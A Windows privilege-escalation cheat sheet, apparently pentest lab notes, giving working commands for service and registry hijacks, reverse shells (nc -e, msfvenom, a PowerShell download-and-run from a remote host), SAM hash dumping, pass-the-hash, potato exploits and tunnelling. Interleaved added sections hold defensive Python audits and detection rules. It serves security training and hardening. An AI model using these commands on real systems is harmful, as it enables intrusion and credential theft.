# Windows PrivEsc

METHODOLOGY:

```
https://lolbas-project.github.io/#
```

POWERSHELL:

```powershell
#Check execution policy
Get-ExecutionPolicy -List

#Set execution policy
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

#Execution policy bypass (scoped to the current user only)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
```

PERMISSIONS:

```
.\accesschk.exe /accepteula Seatbelt.exe
icacls Seatbelt.exe
```

**SERVICE EXPLOITS**

```bash
INSECURE SERVICE PERMISSIONS
#Useful Permissions (SERVICE STOP, SERVICE START)
#Dangerous Permissions (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
#Run winPEAS and check under "Service Information"
#Run PowerUp and check "Checking service permissions"
#Check if you can "MODIFY" any service. Confirm it from the "Modifiable Services" section below it.
#Verify the permissions using "accesschk". We need to have START, STOP, SERVICE_CHANGE_CONFIG
accesschk.exe /accepteula -uwcqv <user> <service>
accesschk.exe -ucqv <service>
#Query the service configuration. Check START_TYPE(DEMAND), BINARY_PATH_NAME, DEPENDENCIES, SERVICE_START_NAME
sc qc <service>
#Check current state of the service
sc query <service>
#Set binary path to reverse shell payload
sc config <service> binpath= "\"C:\PrivEsc\reverse.exe\""
#OR
sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
#If SERVICE_START_NAME isn't LocalSystem then run the following:
sc config <service> obj= ".\LocalSystem" password= ""
#Start a listener in Kali and then start the service to get SYSTEM shell
net start <service>

--------------------------------------------------------------------------------------

UNQUOTED SERVICE PATHS
#Run winPEAS and check "Service Information"
#Run PowerUp and check "Checking for unquoted service paths"
#Check if there is a service with unquoted service path.
#EXAMPLE: C:\Program Files\Unquoted Path Service\Common Files\unquoted.exe
#Verify the permissions using "accesschk". We need to have START, STOP permissions
accesschk.exe /accepteula -uwcqv <user> <service>
accesschk.exe -ucqv <service>
#Check WRITE permissions on each directory in existing binary path (commands commented)
accesschk.exe /accepteula -uwdq C:\
#accesschk.exe /accepteula -uwdq "C:\Program Files\"
#accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
#The current user group (mostly BUILTIN\Users) should have WRITE permissions
#This means if we create a file called Common.exe, it will get executed when the service starts
#Create a msfvenom reverse shell with name Common.exe and copy it to the path we have WRITE permissions to.
#Start a listener and start the service to get reverse shell
net start <service>

--------------------------------------------------------------------------------------

WEAK REGISTRY PERMISSIONS
#Run winPEAS and check "Check if you can modify the registry of the service"
#EXAMPLE: HKLM\SYSTEM\CurrentControlSet\services\regsvc ... Here regsvc = <service>
#Verify the permissions using Powershell or accesschk.exe
Get-Acl HKLM\SYSTEM\CurrentControlSet\services\regsvc | Format-List
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
#If NT AUTHORITY\INTERACTIVE has ALL_ACCESS, do the next step
#Check if we can START and STOP the service
accesschk.exe -ucqv <user> <service>
#View the current value in the registry entry. (ObjectName should be LocalSystem)
reg query HKLM\System\CurrentControlSet\Services\regsvc
#Overwrite the ImagePath value with the reverse shell executable. (This is equivalent to changing the service binpath)
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
#Start a listener on Kali and then start the service
net start <service>

--------------------------------------------------------------------------------------

INSECURE SERVICE EXECUTABLE
#If the original service executable is modifiable by the current user then we can replace it with reverse shell
#Run winPEAS and check "Service Information"
#Run PowerUp and check "Checking service executable and argument permissions"
#Check for "File Permissions: Everyone [AllAccess]"
#EXAMPLE C:\Program Files\File Permissions Service\fileperm.exe
#Verify the permissions with accesschk. We need Everyone: File All Access
accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\fileperm.exe"
#Check if we can START and STOP the service
accesschk.exe /accepteula -uvqc <service>
#Backup the original service executable
copy "C:\Program Files\File Permissions Service\fileperm.exe" C:\temp\
#Overwrite the original service executable with reverse shell
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\fileperm.exe" /Y
#Start a listener on Kali and start the service
net start <service>

--------------------------------------------------------------------------------------

DLL HIJACKING
#Needs admin access
```
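Added example, not part of the original notes: a small Python audit that reproduces the unquoted-path reasoning from the section above. It takes the BINARY_PATH_NAME strings that `sc qc` prints, lists the file names Windows would try before reaching the real executable (the `Common.exe` case from the example path), and reports the ones that fall in a directory `accesschk -uwdq` showed as writable by ordinary users. The service list and writable-directory set are constructed for the example; on a Windows host the `services_from_registry` helper reads the real ImagePath values (read-only) instead, and the writable set must come from the accesschk results.

```python
# Added example for these notes; not code from the original page.
import ntpath
import os

# Constructed sample: service name -> BINARY_PATH_NAME as printed by `sc qc`
# (the same string stored in the service's ImagePath registry value).
SAMPLE_SERVICES = {
    "unquotedsvc": r"C:\Program Files\Unquoted Path Service\Common Files\unquoted.exe",
    "quotedsvc": r'"C:\Program Files\Quoted Service\service.exe" -run',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "svchostlike": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
}
# Constructed: directories that `accesschk -uwdq` reported as writable by BUILTIN\Users.
SAMPLE_WRITABLE_DIRS = {r"C:\Program Files\Unquoted Path Service"}


def hijack_candidates(image_path):
    """File names CreateProcess may try, in order, before the intended executable.

    Returns [] for a quoted path and for a path with no space before the .exe,
    because those are parsed unambiguously.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Everything after the first token ending in .exe is service arguments.
    tokens = []
    for tok in path.split(" "):
        tokens.append(tok)
        if tok.lower().endswith(".exe"):
            break
    # Each space-separated prefix is tried as "<prefix>.exe" before the full path.
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def _norm(path):
    # Case-insensitive compare with the trailing backslash ignored (Windows semantics).
    return ntpath.normcase(path).rstrip("\\")


def audit(services, writable_dirs):
    """(service, candidate) pairs where a candidate would land in a user-writable directory."""
    writable = {_norm(d) for d in writable_dirs}
    findings = []
    for name, image_path in services.items():
        for cand in hijack_candidates(image_path):
            if _norm(ntpath.dirname(cand)) in writable:
                findings.append((name, cand))
    return findings


def services_from_registry():
    """On Windows, read every service's ImagePath from HKLM (read-only, left unexpanded)."""
    import winreg  # only available on Windows
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            try:
                with winreg.OpenKey(root, name) as key:
                    result[name] = winreg.QueryValueEx(key, "ImagePath")[0]
            except OSError:
                pass  # no ImagePath value (driver stub) or no read access
    return result


if __name__ == "__main__":
    services = services_from_registry() if os.name == "nt" else SAMPLE_SERVICES
    writable = SAMPLE_WRITABLE_DIRS  # on a real host, supply the accesschk -uwdq results here
    for svc, candidate in audit(services, writable):
        print(f"{svc}: user-writable hijack point {candidate}")
    for svc, image_path in services.items():
        if hijack_candidates(image_path):
            print(f"{svc}: unquoted path containing spaces -> {image_path}")
```

The fix on the service side is the one the section implies: quote the path (`sc config <service> binpath= "\"C:\Program Files\...\service.exe\""`) or remove the write permission the candidate directory grants to users.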

**REGISTRY EXPLOITS**

```bash
AUTORUNS
#Needs system restart by admin

--------------------------------------------------------------------------------------

ALWAYS INSTALL ELEVATED
#The exploit only works if AlwaysInstallElevated is set to 1 (REG_DWORD 0x1) in both of the keys below
#Run PowerUp and check "Checking for AlwaysInstallElevated registry key"
#HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
#HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#Create a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
#Start a listener and run the .msi file to get SYSTEM shell
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```
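Added example, not part of the original notes: detection logic for the two registry writes used above, the service ImagePath change from the INSECURE SERVICE PERMISSIONS and WEAK REGISTRY PERMISSIONS sections and the AlwaysInstallElevated value from this section. It runs over constructed events in the shape of Sysmon EventID 13 (RegistryEvent, Value Set). Both `sc config ... binpath=` and `reg add ... /v ImagePath` end up as a write to the service's ImagePath value, with one difference that matters for rule writing: through `sc config` the Service Control Manager (services.exe, running as SYSTEM) performs the write, so a rule keyed only on the writing user misses it. The code therefore also checks where the new binary lives. Event field names follow Sysmon; the users, images, service names and paths in the sample are constructed.

```python
# Added example for these notes; not code from the original page.
import ntpath
import re

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SERVICE_IMAGEPATH_RE = re.compile(r"\\services\\[^\\]+\\imagepath$", re.I)
ALWAYS_ELEVATED_RE = re.compile(r"\\policies\\microsoft\\windows\\installer\\alwaysinstallelevated$", re.I)

# Constructed events shaped like Sysmon EventID 13 (RegistryEvent, Value Set).
SAMPLE_EVENTS = [
    # reg add ... /v ImagePath by a low-privilege user: reg.exe performs the write itself
    {"EventID": 13, "User": "LAB\\lowpriv", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\regsvc\ImagePath",
     "Details": r"C:\PrivEsc\reverse.exe"},
    # sc config ... binpath= : the Service Control Manager writes the value as SYSTEM
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\daclsvc\ImagePath",
     "Details": r'"C:\PrivEsc\reverse.exe"'},
    # benign: a vendor installer updating its own service binary
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VendorAgent\ImagePath",
     "Details": r'"C:\Program Files\Vendor\agent.exe" --service'},
    # AlwaysInstallElevated switched on in HKLM (constructed; the writer is not what the rule keys on)
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated",
     "Details": "DWORD (0x00000001)"},
    # unrelated event type, ignored
    {"EventID": 1, "User": "LAB\\lowpriv", "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": "", "Details": ""},
]


def binary_from_details(details):
    """Executable part of a stored ImagePath: the quoted path, or the first token ending in .exe."""
    d = details.strip().replace("%SystemRoot%", r"C:\Windows")
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    m = re.match(r"(.*?\.exe)", d, re.I)
    return m.group(1) if m else d.split(" ")[0]


def is_trusted(path):
    return ntpath.normcase(path).startswith(TRUSTED_ROOTS)


def detect(events):
    """Findings for ImagePath writes and AlwaysInstallElevated writes, with the reasons."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        target, details = ev.get("TargetObject", ""), ev.get("Details", "")
        reasons = []
        if SERVICE_IMAGEPATH_RE.search(target):
            exe = binary_from_details(details)
            if not is_trusted(exe):
                reasons.append(f"service binary outside trusted directories: {exe}")
            # `sc config` writes through services.exe; any other writer bypassed the SCM.
            if ntpath.basename(ev.get("Image", "")).lower() != "services.exe":
                reasons.append(f"ImagePath written directly by {ev.get('User')} via {ev.get('Image')}")
        elif ALWAYS_ELEVATED_RE.search(target):
            m = re.search(r"0x([0-9a-f]+)", details, re.I)
            # Either hive set to 1 is half of the exploitable condition, so flag each write.
            if m and int(m.group(1), 16) == 1:
                hive = target.split("\\")[0]
                reasons.append(f"AlwaysInstallElevated enabled in {hive}")
        if reasons:
            findings.append({"target": target, "user": ev.get("User"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["target"], "by", f["user"])
        for reason in f["reasons"]:
            print("   -", reason)
```

The benign vendor event produces nothing because the binary sits under Program Files and the writer is services.exe; a hardening follow-up for the two service findings is to fix the service DACL or registry key ACL that let a user reach the value in the first place.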

**PASSWORDS**

```bash
STORED PASSWORDS IN REGISTRY
#You can even query the whole registry manually:
#Search the Local Machine hive
reg query HKLM /f password /t REG_SZ /s
#Search the Current User hive
reg query HKCU /f password /t REG_SZ /s

#If the user is an admin then you will get an admin shell using this:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe

#If the user is an admin then you will get a SYSTEM shell using this:
winexe -U 'admin%pass' --system //10.10.10.10 cmd.exe

--------------------------------------------------------------------------------------

SAVED CREDS
#Run winpeas and check under "Windows Credentials"
#Verify this manually
cmdkey /list
#Use runas command to run a program in the context of the admin user
runas /savecred /user:admin C:\PrivEsc\reverse.exe

--------------------------------------------------------------------------------------

CONFIGURATION FILES
#You can also search manually (both commands search from the current directory downward):
dir /s *pass* *.config
findstr /si password *.xml *.ini *.txt
#You can check winpeas under "Looking for possible known files that contain creds."
#Check if you find Unattend.xml. If found, view its contents to find creds.
#Use winexe to log in as the admin user with the password found.

--------------------------------------------------------------------------------------

SAM
#Check if you have READ access to SAM and SYSTEM files
#These files are present at C:\Windows\System32\config
#Backups of these files can be found at C:\Windows\Repair or C:\Windows\System32\RegBack directory
#You can check winpeas under "Looking for possible known files that contain creds."
#Copy the files to the Kali machine and extract the hashes (an NT hash beginning with 31d6 means the password is empty)
python pwdump.py SYSTEM SAM
#Crack the password using JTR or Hashcat
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
#Use winexe to login as admin user using the password cracked

--------------------------------------------------------------------------------------

PASS THE HASH
#Use the hash found to get an ADMIN/SYSTEM shell without the need to crack the hash
pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe
pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe
```
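Added example, not part of the original notes: a scanner that does what the `dir /s *pass*` and `findstr /si password` sweep in the CONFIGURATION FILES section does, but masks each hit so it can be used for a defensive sweep of a host or an image. It opens only files whose names match the patterns the notes rely on (Unattend.xml, sysprep files, web.config, *.ini, *.txt, *.xml and names containing "pass"), matches both `password=` / `password:` style lines and the `<Password><Value>` element used in Unattend.xml, and reports file, line number and a masked value. The file contents are constructed; `scan_directory` runs the same logic over a real tree.

```python
# Added example for these notes; not code from the original page.
import ntpath
import os
import re

# Names worth opening: the files the notes single out plus the dir/findstr patterns.
NAME_PATTERNS = [re.compile(p, re.I) for p in (
    r"^unattend\.xml$", r"^sysprep\.(inf|xml)$", r"^web\.config$",
    r"pass", r"\.(ini|config|txt|xml)$")]
# <Password><Value>...</Value> as used by Unattend.xml, and key=value / key: value lines.
XML_PASSWORD_RE = re.compile(r"<Password>\s*<Value>([^<]+)</Value>", re.I)
KEY_VALUE_RE = re.compile(r"\b(password|passwd|pwd)\s*[=:]\s*([^\s\"';]+)", re.I)

# Constructed sample files (path -> contents); the base64 value is not a real credential.
SAMPLE_FILES = {
    r"C:\Windows\Panther\Unattend.xml":
        "<AutoLogon><Password><Value>Q29uc3RydWN0ZWQ=</Value><PlainText>false</PlainText></Password></AutoLogon>",
    r"C:\inetpub\wwwroot\web.config":
        '<add name="db" connectionString="Server=.;User ID=app;Password=S3cret!" />',
    r"C:\Users\bob\notes.txt": "wifi password: hunter2",
    r"C:\Program Files\App\app.ini": "[db]\nuser=app\npassword=\npwd = abc123",
    r"C:\Users\bob\todo.txt": "Change the password regularly.",
    r"C:\Users\bob\report.docx": "password: not opened, the name matches no pattern",
}


def mask(value):
    """Keep two characters so a hit can be recognised without exposing the secret."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_files(files):
    """files: {path: text}. Returns (path, line_no, masked_value) for each probable credential."""
    findings = []
    for path, text in files.items():
        if not any(p.search(ntpath.basename(path)) for p in NAME_PATTERNS):
            continue
        for line_no, line in enumerate(text.splitlines(), 1):
            m = XML_PASSWORD_RE.search(line) or KEY_VALUE_RE.search(line)
            if m:
                # the value is always the last group of whichever pattern matched
                findings.append((path, line_no, mask(m.group(m.lastindex))))
    return findings


def scan_directory(root, max_bytes=1_000_000):
    """Run scan_files over a real tree, opening only matching names and skipping large or unreadable files."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not any(p.search(name) for p in NAME_PATTERNS):
                continue
            full = os.path.join(dirpath, name)
            try:
                if os.path.getsize(full) <= max_bytes:
                    with open(full, encoding="utf-8", errors="ignore") as fh:
                        files[full] = fh.read()
            except OSError:
                pass
    return scan_files(files)


if __name__ == "__main__":
    for path, line_no, masked in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no}: {masked}")
```

An empty `password=` line and a sentence that merely mentions the word produce no finding, which keeps the output focused on values worth rotating or removing.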

**SCHEDULED TASKS**

```bash
#You cannot query tasks of a particular user. You need to query all the tasks
#CMD
schtasks /query /fo LIST /v
#POWERSHELL
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Also check various directories if you can find a script that is running as a scheduled task
#Check the permissions of the script/task using accesschk
accesschk.exe /accepteula -quvw <user> <task/script>
#Check the contents of the file
type <task/script>
#Create a backup of the original file and then append the following to get reverse shell
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
#Start a netcat listener. You will get a shell when the task is run
```

**INSECURE GUI APPS**

```
#You need RDP access and an application which is running with admin rights
```

**STARTUP APPS**

```bash
#You need to simulate ADMIN LOGIN
#Similar to AutoRun. Windows stores Startup applications in: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#The files in this directory are shortcuts (lnk files).
#Check the permissions of that directory with icacls
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Check if BUILTIN\Users group has full access (F)

#You can also run accesschk.exe to check for (F)
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

#Generate payload:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe

#METHOD 1
#Transfer it to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#Start a netcat listener and simulate a login from admin to get a shell

#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript to create a shortcut of that exe to the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save
#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs
#Simulate an admin login to get a shell
```
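Added example, not part of the original notes, covering the SCHEDULED TASKS and STARTUP APPS checks together: it parses the `schtasks /query /fo LIST /v` output and the `icacls` output those two sections rely on, reports privileged tasks (Run As User of SYSTEM or an Administrator account) whose script or executable carries an ACE giving Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE write-class rights, and applies the same ACE check to the Startup folder. The task listing and ACL text are constructed to match the real output formats; the identity and rights sets are assumptions made for this example.

```python
# Added example for these notes; not code from the original page.
import re

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# full, modify, write, delete and the specific write/owner rights icacls can print
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}
LOW_PRIV_IDENTITIES = {"everyone", "builtin\\users", "authenticated users",
                       "nt authority\\authenticated users", "nt authority\\interactive"}
PRIVILEGED_RUNAS = {"system", "nt authority\\system"}
STARTUP_DIR = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed: `schtasks /query /fo LIST /v` output, trimmed to the fields used here.
SAMPLE_SCHTASKS = r"""
Folder: \
HostName:                             WIN-LAB
TaskName:                             \CleanUp
Status:                               Ready
Author:                               WIN-LAB\Administrator
Task To Run:                          powershell.exe -File C:\DevTools\CleanUp.ps1
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM

HostName:                             WIN-LAB
TaskName:                             \UserBackup
Status:                               Ready
Author:                               WIN-LAB\bob
Task To Run:                          C:\Users\bob\backup.bat
Scheduled Task State:                 Enabled
Run As User:                          WIN-LAB\bob

Folder: \Microsoft\Windows\Defrag
HostName:                             WIN-LAB
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
"""

# Constructed: `icacls <path>` output for the files and the folder the two sections check.
SAMPLE_ACLS = {
    r"C:\DevTools\CleanUp.ps1": r"""C:\DevTools\CleanUp.ps1 BUILTIN\Users:(F)
                        NT AUTHORITY\SYSTEM:(F)
                        BUILTIN\Administrators:(F)

Successfully processed 1 files; Failed processing 0 files""",
    r"C:\Users\bob\backup.bat": r"""C:\Users\bob\backup.bat WIN-LAB\bob:(F)
                        NT AUTHORITY\SYSTEM:(F)

Successfully processed 1 files; Failed processing 0 files""",
    STARTUP_DIR: STARTUP_DIR + r""" BUILTIN\Users:(OI)(CI)(F)
                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                        BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files""",
}


def parse_schtasks_list(text):
    """One dict per task; LIST output separates tasks with blank lines."""
    tasks, block = [], {}
    for line in text.splitlines() + [""]:
        if not line.strip():
            if "TaskName" in block:
                tasks.append(block)
            block = {}
            continue
        key, _, value = line.partition(":")   # values like C:\... keep their own colon
        block[key.strip()] = value.strip()
    return tasks


def parse_icacls(output, path):
    """(identity, [rights]) per ACE with inheritance flags removed; `path` is the queried object."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()   # first line carries the path before its ACE
        if ":(" not in line:
            continue                          # blank or summary line
        identity, _, rights = line.rpartition(":")
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", rights) for t in grp.split(",")]
        aces.append((identity, [t for t in tokens if t not in INHERIT_FLAGS]))
    return aces


def weak_aces(aces):
    """ACEs that give a low-privilege identity write-class rights."""
    return [(i, r) for i, r in aces if i.lower() in LOW_PRIV_IDENTITIES and set(r) & WRITE_RIGHTS]


def files_in_command(command):
    """Quoted paths and script/executable tokens referenced by a task's command line."""
    return [a or b for a, b in re.findall(r'"([^"]+)"|(\S+\.(?:ps1|bat|cmd|vbs|exe))', command, re.I)]


def audit_tasks(tasks, acls):
    """Privileged tasks whose script or binary has a weak ACE (icacls text looked up by path)."""
    findings = []
    for task in tasks:
        run_as = task.get("Run As User", "").lower()
        if run_as not in PRIVILEGED_RUNAS and not run_as.endswith("\\administrator"):
            continue
        for target in files_in_command(task.get("Task To Run", "")):
            if target in acls:
                weak = weak_aces(parse_icacls(acls[target], target))
                if weak:
                    findings.append((task["TaskName"], target, weak))
    return findings


if __name__ == "__main__":
    for name, target, weak in audit_tasks(parse_schtasks_list(SAMPLE_SCHTASKS), SAMPLE_ACLS):
        print(f"task {name} runs {target} as a privileged user; weak ACEs: {weak}")
    print("Startup folder weak ACEs:", weak_aces(parse_icacls(SAMPLE_ACLS[STARTUP_DIR], STARTUP_DIR)))
```

The `\CleanUp` task is the finding: it runs as SYSTEM and BUILTIN\Users hold (F) on its script. The user's own backup task is skipped, and the Microsoft defrag task is skipped because no ACL was supplied for its binary, which matches the `-notlike "\Microsoft*"` filter the PowerShell one-liner in the section applies.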

**INSTALLED APPS**

```bash
#If you find any third-party installed apps then you can look them up on Exploit-DB.
#Use the Exploit-DB filters to narrow the results.
#The same approach works for Linux as well
#Manually enumerate the programs installed:
tasklist /V
#You can use Seatbelt to check for non-standard processes
#You can use Winpeas and check the same under "Processes Information"
```

**HOT POTATO**

```bash
#Unpatched Windows 7, Windows 8 and early Windows 10 versions are vulnerable to this. (Patched in 2016)
#Start netcat listener and then run the following command to get a shell.
.\potato.exe -ip <victimIP> -cmd "C:\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
```

**TOKEN IMPERSONATION**

```bash
JUICY POTATO
#Check if SeImpersonatePrivilege is enabled
whoami /priv
#Create a bat file with following content (You can replace this with msfvenom)
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1')
#Transfer the bat file, jp.exe to target machine
#Host a Nishang shell and start a netcat listener
#Run the exploit
./jp.exe -t * -p shell.bat -l 4444
#If the exploit doesn't give a shell then check the CLSID in the output. You can also look one up at http://ohpe.it/juicy-potato/CLSID/
#Then run the following
jp.exe -l 4444 -p shell.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}

--------------------------------------------------------------------------------------

ROGUE POTATO
#Successor of JuicyPotato, which was patched in later versions of Windows 10
#You need to have a shell as a service account (LocalService)
#Check if SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege is enabled
#Run a socat redirector to redirect traffic to port 135 over to port 9999 on Victim machine
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.234.60:9999
#Start a netcat listener and run the RoguePotato exploit (port 9999 matches the socat redirector above)
RoguePotato.exe -r <kaliIP> -e "C:\PrivEsc\reverse.exe" -l 9999
#You will get system shell

--------------------------------------------------------------------------------------

PRINTSPOOFER
#You need to have a shell as a service account (LocalService)
#Check if SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege is enabled
#Start a netcat listener and run the PrintSpoofer exploit
PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
#You will get system shell
```
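Added example, not part of the original notes: a parser for `whoami /priv` that answers the first check in all three entries above, whether the token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. For a hardening audit the privilege counts as held whether the State column reads Enabled or Disabled, since a process can enable a privilege already present in its token; the finding is that whatever runs as that account (typically a service account) carries this exposure, which is the argument for keeping untrusted code away from such accounts. The two command outputs are constructed; `current_token_privs` runs the real command on a Windows host.

```python
# Added example for these notes; not code from the original page.
import re
import subprocess
import sys

# Token privileges the potato / PrintSpoofer family depend on.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed `whoami /priv` output for a service-account shell ...
SAMPLE_SERVICE_ACCOUNT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
# ... and for an ordinary interactive user (also constructed).
SAMPLE_STANDARD_USER = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""


def parse_whoami_priv(text):
    """{privilege name: 'Enabled' | 'Disabled'} from the table whoami /priv prints."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def impersonation_exposure(privs):
    """Impersonation-class privileges the token holds, regardless of State:
    a privilege that is present but Disabled can be enabled by the process."""
    return sorted(p for p in privs if p in IMPERSONATION_PRIVS)


def current_token_privs():
    """On Windows, run whoami /priv for the current process and parse it."""
    out = subprocess.run(["whoami", "/priv"], capture_output=True, text=True, check=True).stdout
    return parse_whoami_priv(out)


if __name__ == "__main__":
    privs = current_token_privs() if sys.platform == "win32" else parse_whoami_priv(SAMPLE_SERVICE_ACCOUNT)
    exposure = impersonation_exposure(privs)
    print("impersonation exposure:", ", ".join(exposure) if exposure else "none")
```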

**PORT FORWARDING**

```bash
#Used when we need to run an exploit on Kali but vulnerable program is listening on an internal port
#We need to forward Kali Port to internal port on Windows
#Can be used with winexe when 445 is listening internally

PLINK
#Run the following command
.\plink.exe root@10.11.15.38 -R <kaliPORT>:127.0.0.1:<victimPORT>
.\plink.exe root@10.11.15.38 -R 445:127.0.0.1:445

CHISEL
#Run this on Kali machine
./chisel_1.5.2_linux_amd64 server -p 444 --reverse
#Run this on victim machine
chisel.exe client <kaliIP>:444 R:445:127.0.0.1:445
```

